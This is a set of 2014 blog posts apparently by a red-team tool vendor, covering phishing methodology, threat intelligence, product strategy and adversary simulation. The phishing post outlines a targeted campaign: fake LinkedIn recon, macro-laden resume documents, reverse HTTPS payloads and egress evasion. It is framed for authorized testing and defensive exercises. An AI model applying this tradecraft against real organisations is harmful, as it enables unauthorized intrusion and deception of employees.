h1

Course Review: Dark Side Ops

December 22, 2014

“Dark Side Ops (DSO) is a course on targeted attacks, evasion, and advanced post exploitation… with a twist. The thesis of DSO is this: if you want to credibly simulate a real world attacker, you need advanced capability. You can’t do this with unmodified open source tools. This course teaches students how to build and modify advanced capabilities. Let’s take a closer look.”

Recently, I spent a few days in a course that combines malware development and advanced tradecraft into one package. I thought the course was so good, I wrote a review on it. You can check out the review over at ethicalhacker.net.

h1

What’s the go-to phishing technique or exploit?

December 17, 2014

This blog post is inspired by a question sent to a local mailing list. The original poster asks, what’s the go-to phishing technique or exploit in a blackbox situation? Here’s my response:

I’ve had to do this before, I sell tools to do it now, and I’ve seen how others teach and go about this particular process. First, I recommend that you read MetaPhish. No other paper or talk has influenced how I think about this process more:

You’ll notice I said the word process. Before you dig into a toolset, you’ll want to figure out the process you’re going to use. Here’s what I used and it has parallels with the processes I see others use now [regardless of toolset]:

0. Information Gathering

Find out about your target, harvest email addresses, etc. etc. etc.

1. Reconnaissance

This is the phase where you sample the target’s client-side attack surface. I used to send a few fake LinkedIn invitations across an org and direct those folks to a web app that profiles their browser. Similar information to what you see here: http://browserspy.dk/

I’ve seen some organizations use BeEF for this purpose and Black Squirrel does this as well.

2. Stand up a Test Environment

Next, I recommend that you create a virtual machine to mirror their environment as closely as possible. Install patches and other tweaks you think may be present. This isn’t the place to underestimate their posture. I’d also recommend trying out the different A/V products you expect to see at this point. Use the information from the reconnaissance step to make this as exact as possible.

3. Choose your attack

Now, you will need to select an attack to use against your target. I really recommend that you stay away from the memory corruption exploits in the Metasploit Framework. You can tweak them to get around some anti-virus products. But, you really need to pay attention to the exploit’s needs. For example, let’s say the target profile reveals a vulnerable version of IE and Metasploit has an exploit for it. What are the dependencies of that exploit? Does it also require Java 1.6 to help it get past some of Windows’ protections? You could play this game. Or, you could skip it altogether.

Many folks who execute these kinds of engagements regularly use user-driven attacks. A user-driven attack is an attack that relies on functionality and fooling the user into taking some detrimental action. The Java Applet attack is an example of a very popular user-driven attack. I’m surprised it still works today, but *shrug*. Embedding a macro into a Word or Excel spreadsheet is also effective.

The stock vba macro you can get out of MSF is also pretty good [it injects straight into memory]. I understand that BeEF has some options in this area too, but I haven’t played with them.

4. Pair your attack with a payload

Don’t take it for granted that you’ll walk out of your target’s network with a Metasploit Framework payload. I see egress as one of the toughest problems when working with a harder target. If you have to use a Metasploit Framework payload, windows/meterpreter/reverse_https is your best bet here. I recommend that you look for and consider other options though. A lot of organizations who do this kind of work have a custom payload or they buy one. If I were in a hurry to cobble up a process and didn’t have a budget, I’d look at building something in PowerShell. The main things you care about:

a. Is the payload proxy aware? Will it take the same actions that the user’s browser would take to get out to the internet?

b. Can I match the payload’s characteristics to the target environment? For example, making its User-Agent match something legitimate?

bb. If I opt to go SSL, can I use a legitimate certificate? If not, does the payload at least try to look like legitimate traffic if I communicate without SSL?

c. Is the payload asynchronous? You really want something reliable that doesn’t stand out while you figure out what to do next on your target’s network.

d. Can I pair this payload with my attack? This is an important consideration. If you have a great piece of custom malware but *can’t* pair it with your chosen attack, it’s not useful to you for this phase of your engagement.

Your custom payload [bought/built] does not need to be fully functional. Its main goal is to defeat egress restrictions and act as a lifeline while you figure out the best steps to fortify your access [if that’s what your customer wants]. The main thing it needs to be able to do is spawn another payload.

Here’s one of my favorite talks on how to pull something like this together, quickly:

I also recommend that you setup infrastructure for each piece of this attack. You should send phishes from different places. You should host your recon app on its own server. The server your user-driven stages your payload from should differ from the server the payload actually communicates with [if your payload is delivered in stages]. Ideally, your asynchronous lifeline payload should call home to multiple hosts in case one of them becomes blocked.

5. Deliver the package

The final phase is to send the package on to your target. I don’t recommend that you spray every email you found. If your goal is to demonstrate a targeted attack, be targeted.

Personally, I’m a stickler for pixel perfect phishing emails and I’m not a fan of crafting an HTML email in a hacker tool to achieve this. If in doubt, I recommend that you use the same email client that your legend [the person you’re pretending to be] would use to send the email. If your target is someone in HR and your legend is someone applying for a job, use Gmail to send your phish. Preferably, the same Gmail account noted in the resume.doc you embedded a macro inside of.

Before you phish, I recommend that you send your package to yourself, through infrastructure that mirrors your target environment as closely as possible. If your target uses a cloud email service, try to get an account on the free or low-tier paid version of this service and send your package to yourself there. If your target uses a more traditional Exchange+Outlook setup, see if you can build a lab with those pieces or rely on a friend who has access to something similar. The main point here is to make sure your lovingly crafted bundle of good isn’t going to the spam folder. It’d be a shame to go through all of this work to get stopped by that.

Even if you have a favorite “go to” user-driven attack, I recommend executing this process anyways. You don’t want to fire an attack package crafted for a Windows environment only to find that your target is a MacOS X shop.

Tradecraft parts 3, 4, and 8 cover these topics.

h1

Audiences… or who I think I’m writing for

December 11, 2014

This is another meta-post about this blog. If you’re not a regular reader of this blog, this post is probably not for you. I’d like to share the different audiences I imagine when I write on this blog. Conveniently, the categories map quite well to audiences.

In the Metasploit Framework category I imagine that I’m writing to members of the Metasploit Framework community. I generally document the undocumented and share things I’ve learned digging deep into the framework here. My assumption is that if I find it interesting, others probably will too.

In the red team category I write a lot about my experiences supporting different cyber defense exercises. Once in a while, I delve into experiences from when I was penetration testing. This category is a mix of techniques and ideas about how to organize a red team. Earlier this year I had the opportunity to take part in a large-scale cyber war game run by folks I hadn’t worked with before. When I arrived, I found out that a big part of how I got there was this blog. Apparently, not enough people talk about how to scale large red teams and collaborate. Who knew?

In the Cobalt Strike category I announce new releases and I write about different Cobalt Strike features. This category is meant for Cobalt Strike’s users. I see my blog as an extension of the online training. I update the online course every two years. In between, this blog is my place to capture the thought process and tradecraft that goes with each new feature. If you want to keep up with the latest of what Cobalt Strike can do or where it’s going, this blog is the place to do it. Often times questions customers ask will end up as posts in this category too.

Once in a great while I make an attempt at writing reference pieces. These are my “What Penetration Testers Should Know” posts. I find these posts incredibly difficult to write. I usually stick these in the red team category. These posts have minimal marketing in them and usually appeal to a broad audience. I know when I want more traffic, I can sequester myself for a week to write one. Sadly, I don’t have many weeks where I can get away with this.

Some past posts:

I also occasionally write blog posts that document a technique and include source code. I think it’s important to continue to share code and knowledge with my peers. These posts are pretty difficult to write as well. The code I release in these contexts is usually meant as something for others to learn from, so I have to take my time to make it clear and document it.

Some past examples of these posts include:

And, finally, I’m starting to write blog posts on industry trends I see. I work with a lot of red teams and services firms through my Cobalt Strike product. These teams buy my product because there’s something they want to do with it. From this vantage point I see penetration testing evolving. The old way probably won’t go away, but I see new kinds of offensive services resonating well with customers. These posts are targeted at those who are championing these ideas within their organizations.

Here’s a few to look at along these lines:

And, that’s pretty much it. I published my post for this week and now I’m off the hook.

h1

When You Know Your Enemy

December 4, 2014

TL;DR This is my opinion on Threat Intelligence: Automated Defense using Threat Intelligence feeds is (probably) rebranded anti-virus. Threat Intelligence offers benefit when used to hunt for or design mitigations to defeat advanced adversaries. Blue teams that act on this knowledge have an advantage over that adversary and others that use similar tactics.

Threat Intelligence is one of those topics you either love to scoff at or embrace. In this post, I’ll share my hopes, dreams, and aspirations for the budding discipline of Threat Intelligence.

I define Threat Intelligence as actionable adversary-specific information to help you defend your network. There are several firms that sell threat intelligence. Each of these firms track, collect on, and produce reports and raw indicator information for multiple actors. What’s in these reports and how these companies collect their information depends on the company and the means and relationships at their disposal.

How to best get value from Threat Intelligence is up for debate and there are many theories and products to answer this question. The competing ideas surround what is actionable information and how you should use it.

Anti-virus Reborn as… Anti-virus

One theory for Threat Intelligence is to provide a feed with IP addresses, domain names, and file hashes for known bad activity. Customers subscribe to this feed, their network defense tools ingest it, and now their network is automatically safe from any actor that the Threat Intelligence provider reports on. Many technical experts scoff at this, and not without reason. This is not far off from the anti-virus model.

The above theory is NOT why I care about Threat Intelligence. My interest is driven by my admittedly skewed offensive experiences. Let me put you into my shoes for a moment…

I build hacking tools for a living. These tools get a lot of use at different Cyber Defense Exercises. Year after year, I see repeat defenders and new defenders. For some defenders, Cobalt Strike is part of their threat model. These teams know they need to defend against Cobalt Strike capability. They also know they need to defend against the Metasploit Framework, Dark Comet, and other common tools too. These tools are known. I am quick to embrace and promote alternate capabilities for this exact reason. Diversity is good for offense.

I have to live with defenders that have access to my tools. This forces me to come up with ways for my power users and I to stay ahead of smart defenders. It’s a fun game and it forces my tools to get better.

The low hanging fruit of Threat Intelligence makes little sense to me. As an attacker, I can change my IP addresses easily enough. I stand up core infrastructure, somewhere on the internet, and I use redirectors to protect my infrastructure’s location from network defenders. Redirectors are bounce servers that sit between my infrastructure and the target’s network. I also have no problem changing my hashes or the process I use to generate my executable and DLL artifacts. Cobalt Strike has thought out workflows for this.

I worry about the things that are harder to change.

Why is notepad.exe connecting to the Internet?

Each blue team will latch on to their favorite indicators. I remember one year many blue teams spoke of the notepad.exe malware. They would communicate with each other about the tendency for red team payloads to inject themselves into notepad.exe. This is a lazy indicator, originating from the Metasploit Framework and older versions of Cobalt Strike. It’s something a red operator can change, but few bother to do so. I would expect to see this type of indicator in the technical section of a Threat Intelligence report. This information would help a blue team get ahead of the red teams I worked with that year.

If you’d like to see how this is done, I recommend that you read J.J. Guy‘s case study on how to use Carbon Black to investigate this type of indicator.

Several blue teams worry about Cobalt Strike and its Beacon payload. This is my capability to replicate an advanced adversary. These teams download the trial and pick apart my tool to find indicators that they can use to find Beacon. These teams know they can’t predict my IP addresses, which attack I will use, or what file I will touch disk with. There are other ways to spot or mitigate an attacker’s favorite techniques.

DNS Command and Control

One place you can bring hurt to an attacker is their command and control. If you understand how they communicate, you can design mitigations to break this, or at least spot their activity with the fixed indicators in their communication. One of my favorite stories involves DNS.

Cobalt Strike has had a robust DNS communication capability since 2013. It’s had DNS beaconing since late 2012. This year, several repeat blue teams had strategies to find or defeat DNS C2. One team took my trial and figured out that parts of my DNS communication scheme were case sensitive. They modified their DNS server to randomly change the casing of all DNS replies and break my communication scheme.

This helped them mitigate red team activity longer than other blue teams. This is another example where information about your adversary can help. If you know there’s a critical weakness in your adversary’s toolchain, use that weakness to protect your network against it. This is not much different from spoofing a mutex value or changing a registry option to inoculate a network against a piece of malware.

This story doesn’t end there though. This team fixated on DNS and they saw it as the red team’s silver bullet. Once we proved we could use DNS, we put our efforts towards defeating the proxy restrictions each team had in place. We were eventually able to defeat this team’s proxy and we had another channel to work in their network. We used outbound HTTP requests through their restrictive proxy server to control a host and pivot to others. They were still watching for us over DNS. The lesson? Even though your Threat Intelligence offers an estimate of an adversary’s capability, don’t neglect the basics, and don’t assume that’s the way they will always hit you. A good adversary will adapt.

To Seek Out New Malware in New Processes…

After a National CCDC event, a student team revealed that they would go through each process and look for WinINet artifacts to hunt Beacon. This is beautiful on so many levels. I build technologies, like Malleable C2, to allow a red operator to customize their indicators and give my payload life, even when the payload is known by those who defend against it. This blue team came up with a non-changing indicator in my payload’s behavior. Fixed malware behavior or artifacts in memory are things a Threat Intelligence company can provide a client’s hunt team. These are tools to find the adversary.

It’s (not) always about the Malware

The red teams I work with quickly judge which teams are hard and which teams are not. We adjust our tradecraft to give harder teams a better challenge. There are a few ways we’ll do this.

Sometimes I know I can’t put malware on key servers. When this happens, I’ll try to live on the systems the defenders neglect. I then use configuration backdoors and trust relationships to keep access to the servers that are well protected. When I need to, I’ll use RDP or some other built-in tool to work with the well protected server. In this way, I get what I need without alerting the blue team to my activity. Malware on a target is not a requirement for an attacker to accomplish their goal.

CrowdStrike tracks an actor they call DEEP PANDA. This actor uses very similar tradecraftIf a blue team knew my favored tradecraft and tricks in these situations, they could instrument their tools and scripts to look for my behavior.

A few points…

You may say, that’s one adversary. What about the others? There are several ways to accomplish offensive tasks and each technique has its limitations (e.g., DNS as a channel). If you mitigate or detect a tactic, you’ll likely affect or find other adversaries that use that tactic too. If an adversary comes up with something novel and uses it in the wild, Threat Intelligence is a way to find out about it, and stay ahead of advancing adversary tradecraft. Why not let the adversary’s offensive research work for you?

You may also argue that your organization is still working on the basics. They’re not ready for this. I understand. These concepts are not for every organization. If you have a mature intrusion response capability, these are ideas about how Threat Intelligence can make it better. These concepts are a complement to, not a replacement for, the other best practices in network defense.

And…

You’ll notice that I speak favorably of Threat Intelligence and its possibilities. I read the glossy marketing reports these vendors release to tease their services. The information in the good reports isn’t far off from the information blue teams use to understand and get an edge in different Cyber Defense Exercises.

In each of these stories, you’ll notice a common theme. The red team is in the network or will get in the network (Assume Compromise!). Knowledge of the red actor’s tools AND tradecraft helps the blue teams get an advantage. These teams use their adversary knowledge in one of two ways: they either design a mitigation against that tactic or they hunt for the red team’s activity. When I look at Threat Intelligence, I see the most value when it aids a thinking blue operator in this way. As a red operator, this is where I’ve seen the most challenge.

Further Reading

  • Take a look at The Pyramid of Pain by David Bianco. This post discusses indicators in terms of things you deny the adversary. If you deny the adversary an IP address, you force them to take a routine action. If you deny the adversary use of a tool, you cause them a great deal of pain. David’s post is very much in the spirit of this one. Thanks to J.J. Guy for the link.

 

h1

My Constraint-based Product Strategy

November 26, 2014

When I work on a project, I like to define a broad problem statement. This is the project’s intended mark on the world. I don’t have enough hubris to claim a solution for all cases. To make my project’s tractable, I define assumptions. These assumptions bound the problem statement and keep the work under control. I tend to live within my assumptions until I feel the project has outgrown them. When this happens, I look for an opportunity to redefine my work under a new problem statement or at least, new assumptions.

In this blog post, I’ll take you through the problem statements and assumptions that define Armitage and Cobalt Strike. It’s fitting that I write this now, because I’m re- examining Cobalt Strike’s problem statement and assumptions.

Armitage

Armitage is a scriptable user interface for the Metasploit Framework that allows red teams to collaborate. Armitage has a broad problem statement: how do I help red teams collaborate?

Armitage lives under a set of assumptions.

First, I had to define a use case for this project. I opted to scope Armitage’s use case to exercise red teams, particularly red teams for the Collegiate Cyber Defense Competitions, which I had a lot of volunteer involvement with.

Next, I scoped Armitage to the Metasploit Framework only. I had zero intention of building the one collaboration framework to rule them all. I wanted to explore some ideas within the context of the Metasploit Framework and what it offers. This meant I would not integrate third-party hacking tools with Armitage and I would not build new hacking capability into it. These assumptions gave me suitable constraints to build and reason about Armitage.

This weekend, Armitage will celebrate its fourth birthday. I continue to maintain this project, but Armitage was successful in its original efforts a long time ago. Today, most penetration testing and red team platforms have collaboration features. Armitage is a familiar face at events where hackers have to work together with the Metasploit Framework. We now have good  practices [1, 2, 3, 4] to organize red teams in cyber defense exercises.

Cobalt Strike

I used to work on a red team support contract. Stealth and evasion mattered a great deal. I ran into the limitations of available tools. I saw a need for penetration testing tools to challenge harder targets. My work on these problems became Cobalt Strike. I define Cobalt Strike’s problem set as closing the gap between penetration testing tools and so-called advanced threat capabilities. It’s in my logo even! “Advanced Threat Tactics for Penetration Testers”. 

Like Armitage, Cobalt Strike lives under a set of assumptions too.

Every feature I build into Cobalt Strike requires synergy with a stock instance of the Metasploit Framework. This assumption led to a collection of tools very focused on the Windows attack surface. Some of Cobalt Strike’s concepts would be right at home with a MacOS X target, but there’s too little opportunity for synergy with the Metasploit Framework, so I haven’t looked in this direction. My emphasis on 32-bit payloads, also comes from this assumption.

Second, Cobalt Strike is made for a hypothetical internal red team for a large corporate or government enterprise. This assumption has had major influences on my product. It defines the problems I care about and the things I ignore. Let’s use browser pivoting as an example. This technology was made to meet a need for a segment of users. These users care about Internet Explorer, not Google Chrome or Firefox. Hence, browser pivoting was made for Internet Explorer.

Third, Cobalt Strike is built for a remote operations use case. This influences the problems I work on as well. I assume that my user is a remote actor. This is why I provide covert communication options and focus on ways to evade egress restrictions. Under my assumptions, if a user can’t get out, they can’t use the rest of the toolset. This assumption also limits the features I build and the workflows I support. If a tactic isn’t practical for a remote actor, I ignore it.

My last assumption relates to what Cobalt Strike does. Cobalt Strike executes targeted attacks and replicates advanced threats. That statement is marketing speak for sends phishing emails and focuses on post exploitation. I wrote the last sentence, tongue-in-cheek, but there’s a reality to it. My tool supports a process: setup a client-side attack, phish to get a foothold, abuse trusts for lateral movement, and conduct post exploitation to achieve some objective/demonstrate risk. I focus on this process and work to make this tool better support it. Few engagements execute this process end-to-end, so I make sure to decouple these pieces from each other.  That said, this clear definition of what Cobalt Strike does helps guide my development efforts.

Cobalt Strike has nearly two and a half years on the market and it’s had a lot of updates in that time. I still have work to do within Cobalt Strike’s problem set, but I feel it’s a good product for its stated use cases.

What’s next?

I’m thinking a lot about Cobalt Strike’s next iteration. At this time, I’m revisiting Cobalt Strike’s problem statement and assumptions. As I think about what’s coming next, here are a few things at the top of my mind:

First, I believe there’s a “good enough” level for hacker capability. After a point, better malware and capability will only take a red team so far. I see several needs that I categorize as features to support assessors with growing accountability and story telling requirements. This is a sign that some security programs are maturing and these customers expect more detail from us. I think there’s a need to put equal effort into these requirements.

I also believe we’re witnessing the emergence of a service that most penetration testers and red teams will soon offer. These are assessments that assume compromise and focus on an organization’s post-compromise security posture. Particularly, the organization’s ability to detect and remediate a sophisticated intruder. I wrote about this in a previous blog post.

Finally, I believe the deprecation of Windows XP was the end of an era. There are ideas and concepts in our tools and services that date back to the beginning of this era. I think some of these things are holding us back.

I’m not ready to speak specifics on these things yet, but I’m closely examining my tradecraft, process, and tools. I’m asking the hard questions: what’s historic baggage? What makes sense for the red team and adversary simulation use cases going forward?

h1

Cobalt Strike 2.2 – 1995 called, it wants its covert channel back…

November 20, 2014

Cobalt Strike’s Covert VPN feature now supports ICMP as one of its channels. Covert VPN is Cobalt Strike’s layer-2 pivoting capability. If you’re curious about how this technology works, I released some source code a few weeks ago.

The ICMP data channel is a turn-key way to demonstrate ICMP as an exfiltration channel if you need to prove a point. Here’s a video demonstrating Covert VPN’s ICMP channel with a server in Amazon’s EC2:

I don’t expect you to VPN all the things, but I’m excited. This feature is a step towards other work with ICMP in the future.

The ICMP VPN channel is available in today’s 2.2 release of Cobalt Strike. This release also touches and improves many of Cobalt Strike’s other features. The VNC server injection process was rewritten to better evade host-based firewalls. The spear phishing tool now handles message templates with embedded image attachments. You also get several bug fixes too. I recommend that you read the release notes for the full list of changes.

Licensed users may get the latest with the built-in update program. A 21-day trial of Cobalt Strike is available too.

h1

Adversary Simulation Becomes a Thing…

November 12, 2014

There is a growing chorus of folks talking about simulating targeted attacks from known adversaries as a valuable security service.

The argument goes like this: penetration testers are vulnerability focused and have a toolset/style that replicates a penetration tester. This style finds security problems and it helps, but it does little to prepare the customer for the targeted attacks they will experience.

Adversary simulation is different. It focuses on the customer’s ability to deal with an attack, post-compromise. These assessments look at incident response and provide a valuable “live fire” training opportunity for the analysts who hunt for and respond to incidents each day.

The organizations that buy security products and services are starting to see that compromise is inevitable. These organizations spend money on blinky boxes, people, services, and processes to deal with this situation. They need a way to know whether or not this investment is effective. Adversary simulation is a way to do this.

What is adversary simulation?

There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard threat emulationpurple teaming, and attack simulation to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and we’re working to describe an elephant to each other.

From the discussions on this concept, I see a few common elements:

The goal of adversary simulation is to prepare network defense staff for the highly sophisticated targeted attacks their organization may face.

Adversary simulation assumes compromise. The access vector doesn’t matter as much as the post-compromise actions. This makes sense to me. If an adversary lives in your network for years, the 0-day used three years ago doesn’t really matter. Offensive techniques, like the Golden Ticket, turn long-term persistence on its head. An adversary may return to your network and resume complete control of your domain at any time. This is happening.

Adversary simulation is a white box activity, sometimes driven by a sequence of events or a story board. It is not the goal of an adversary simulation exercise to demonstrate a novel attack path. There are different ways to come up with this sequence of events. You could use a novel attack from a prior red team assessment or real-world intrusion. You could also host a meeting to discuss threat models and derive a plausible scenario from that.

There’s some understanding that adversary simulation involves meaningful network and host-based indicators. These are the observables a network defense team will use to detect and understand the attacker. The simulated indicators should allow the network defense team to exercise the same steps they would take if they had to respond to the real attacker. This requires creative adversary operators with an open mind about other ways to hack. These operators must learn the adversary’s tradecraft and cobble together something that resembles their process. They must pay attention to the protocols the adversary uses, the indicators in the communication, the tempo of the communication, and whether or not the actor relies on distributed infrastructure. Host-based indicators and persistence techniques matter too. The best training results will come from simulating these elements very closely.

Adversary simulation is inherently cooperative. Sometimes, the adversary operator executes the scenario with the network defense team present. Other times the operator debriefs after all of the actions are executed. In both cases, the adversary operators give up their indicators and techniques to allow the network defense team to learn from the experience and come up with ways to improve their process. This requirement places a great burden on an adversary simulation toolkit. The adversary operators need ways to execute the same scenario with new indicators or twists to measure improvement.

Hacking to get Caught – A Concept for Adversary Replication and Penetration Testing

Threat Models that Exercise your SIEM and Incident Response

Comprehensive testing Red and Blue Make Purple

Seeing purple hybrid security teams for the enterprise

Isn’t this the same as red teaming?

I see a simulated attack as different from a red team or full scope assessment. Red Team assessments exercise a mature security program in a comprehensive way. A skilled team conducts a real-world attack, stays in the network, and steals information. At the end, they reveal a (novel?) attack path and demonstrate risk. The red team’s report becomes a tool to inform decision makers about their security program and justify added resources or changes to the security program.

A useful full scope assessment requires ample time and they are expensive.

Adversary simulation does not have to be expensive or elaborate. You can spend a day running through scenarios once each quarter. You can start simple and improve your approach as time goes on. This is an activity that is accessible to security programs with different levels of budget and maturity.

How does this relate to Cyber Defense Exercises?

I participate in a lot of Cyber Defense Exercises. Some events are setup as live-fire training against a credible simulated adversary. These exercises are driven off of a narrative and the red team executes the actions the narrative requires. The narrative drives the discussion post-action. All red team activities are white box, as the red team is not the training audience. These elements make cyber defense exercises very similar to adversary simulation as I’m describing here. This is probably why the discussion perks up my ears, it’s familiar ground to me.

There are some differences though.

These exercises don’t happen in production networks. They happen in labs. This introduces a lot of artificiality. The participants don’t get to “train as they fight” as many tools and sensors they use at home probably do not exist in the lab. There is also no element of surprise to help the attacker. Network defense teams come to these events ready to defend. These events usually involve multiple teams which creates an element of competition. A safe adversary simulation, conducted on a production network, does not need to suffer from these drawbacks.

Why don’t we call it “Purple Teaming”?

Purple Teaming is a discussion about how red teams and blue teams can work together. Ideas about how to do this differ. I wouldn’t refer to Adversary Simulation as Purple Teaming. You could argue that Adversary Simulation is a form of Purple Teaming. It’s not the only form though. Some forms of purple teaming have a penetration tester sit with a network defense team and dissect penetration tester tradecraft. There are other ways to hack beyond the favored tricks and tools of penetration testers.

Let’s use lateral movement as an example:

A penetration tester might use Metasploit’s PsExec to demonstrate lateral movement, help a blue team zero in on this behavior, and call it a day. A red team member might drop to a shell and use native tools to demonstrate lateral movement, help a blue team understand these options, and move on.

An adversary operator tasked to replicate the recent behavior of “a nation-state affiliated” actor might load a Golden Ticket into their session and use that trust to remotely setup a sticky keys-like backdoor on targets and control them with RDP. This is a form of lateral movement and it’s tied to an observed adversary tactic. The debrief in this case focuses on the novel tactic and potential strategies to detect and mitigate it.

Do you see the difference? A penetration tester or red team member will show something that works for them. An adversary operator will simulate a target adversary and help their customer understand and improve their posture against that adversary. Giving defenders exposure and training on tactics, techniques, and procedures beyond the typical penetration tester’s arsenal is one of the reasons adversary simulation is so important.

What are the best practices for Adversary Simulation?

Adversary Simulation is a developing area. There are several approaches and I’m sure others will emerge over time…

Traffic Generation

One way to simulate an adversary is to simulate their traffic on the wire. This is an opportunity to validate custom rules and to verify that sensors are firing. It’s a low-cost way to drill intrusion response and intrusion detection staff too. Fire off something obvious and wait to see how long it takes to detect it. If they don’t, you immediately know you have a problem.

Marcus Carey’s vSploit is an example of this approach. Keep an eye on his FireDrill.me company, as he’s expanding upon his original ideas as well.

DEF CON 19 – Metasploit vSploit Modules

Use Known Malware

Another approach is to use public malware on your customer’s network. Load up DarkComet, GhostRAT, or Bifrost and execute attacker-like actions. Of course, before you use this public malware, you have to audit it for backdoors and make sure you’re not introducing an adversary into your network. On the bright side, it’s free.

This approach is restrictive though. You’re limiting yourself to malware that you have a full toolchain for [the user interface, the c2 server, and the agent]. This is also the malware that off-the-shelf products will catch best. I like to joke that some anti-APT products catch 100% APT, so long as you limit your definition of APT malware to Dark Comet.

This is probably a good approach with a new team, but as the network security monitoring team matures, you’ll need better capability to challenge them and keep their interest.

Use an Adversary Simulation Tool

Penetration Testing Tools are NOT adequate adversary simulation tools. Penetration Testing Tools usually have one post-exploitation agent with limited protocols and fixed communication options. If you use a penetration testing tool and give up its indicators, it’s burned after that. A lack of communication flexibility and options makes most penetration testing tools poor options for adversary simulation.

Cobalt Strike overcomes some of these problems. Cobalt Strike’s Beacon payload does bi-directional communication over named pipes (SMB), DNS TXT records, DNS A records, HTTP, and HTTPS. Beacon also gives you the flexibility to call home to multiple places and to vary the interval at which it calls home. This allows you to simulate an adversary that uses asynchronous bots and distributed infrastructure.

The above features make Beacon a better post-exploitation agent. They don’t address the adversary replication problem. One difference between a post-exploitation agent and an adversary replication tool is user-controlled indicators. Beacon’s Malleable C2 gives you this. Malleable C2 is a technology that lets you, the end user, change Beacon’s network indicators to look like something else. It takes two minutes to craft a profile that accurately mimics legitimate traffic or other malware. I took a lot of care to make this process as easy as possible.

Malleable Command and Control

Cobalt Strike isn’t the only tool with this approach either. Encripto released Maligno, a Python agent that downloads shellcode and injects it into memory. This agent allows you to customize its network indicators to provide a trail for an intrusion analyst to follow.

Malleable C2 is a good start to support adversary simulation from a red team tool, but it’s not the whole picture. Adversary Simulation requires new story telling tools, other types of customizable indicators, and it also requires a rethink of workflows for lateral movement and post-exploitation. There’s a lot of work to do yet.

Putter Panda – Threat Replication Case Study

Will Adversary Simulation work?

I think so. I’d like to close this post with an observation, taken across various exercises:

In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary. This is part of what allows these adversaries the freedom to live and work on so many networks. An inability to find these adversaries creates a sense of complacency. If I can’t see them, maybe they’re not there?

By exercising a network defense team and providing actionable feedback with useful details, you’re giving that team a way to understand their level. The teams that take the debrief seriously will figure out how to improve and get better.

Over time, you will find that these teams, spurred by your efforts, are operating at a level that will challenge your ability to create a meaningful experience for them. I’ve provided repeat red team support to many events since 2011. Each year I see the growth of the return teams that my friends and I provide an offensive service to. It’s rewarding work and we see the difference.

Heed my words though: the strongest network defense teams require a credible challenge to get better. Without adversary simulation tools [built or bought], you will quickly exhaust your ability to challenge these teams and keep up with their growth.

Follow

Get every new post delivered to your Inbox.

Join 14,059 other followers